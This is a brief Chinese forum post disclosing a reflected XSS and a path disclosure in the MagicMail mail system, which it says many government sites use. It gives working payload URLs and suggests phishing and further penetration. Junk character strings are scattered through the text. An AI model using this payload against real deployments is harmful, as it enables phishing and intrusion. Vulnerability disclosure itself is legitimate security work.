今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞$ K4 {/ D) `6 X
3 E* Q+ I% k1 ]0 w$ k
" \; |5 @; L) v0 Y3 K包含 一个反射性XSS 以及 绝对路径泄漏
5 _/ b) S( ?+ @; Y& K* W看了看 貌似全部是linux的。
; {3 t* R, \) w) p
9 P& r8 V) [: M- m) t" t% S1 a- z关键字:迈捷邮件系统 by MagicMail
, j4 u* j( w! \4 K4 T) e9 w
& M8 L8 d7 p: d: r1 E1 P, ?! h可以看到很多政府网站都用这个邮件系统. Y5 a/ f5 t5 |7 b0 x7 V/ K
6 \$ |) d& Z0 P& K9 ^1 @
绝对路径 http://madman.in/index.php?login_type=declare&language=9 A, O+ L! w0 b" t
* `2 [( q& h ?4 K7 ^/ A8 T- _4 H3 g2 ~, [
* k0 x- v; l: u5 u5 z. NXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
: \0 v# x& [# }7 d0 z5 X! B, ~ X1 Y, G' I1 N8 k6 K2 ]9 \! r
8 J% P/ k }! u# Q& m% x% e
4 A( i8 U7 O4 C. t' S/ |$ G虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
; q- O& f! \' U, ~2 h
" N: a+ g1 K. X) A6 X3 Z修复方案:看官方补丁吧。0 T3 Y4 {3 e! f2 B5 p3 f+ _
|
发表于 2012-11-9 20:38:41
收藏
支持
反对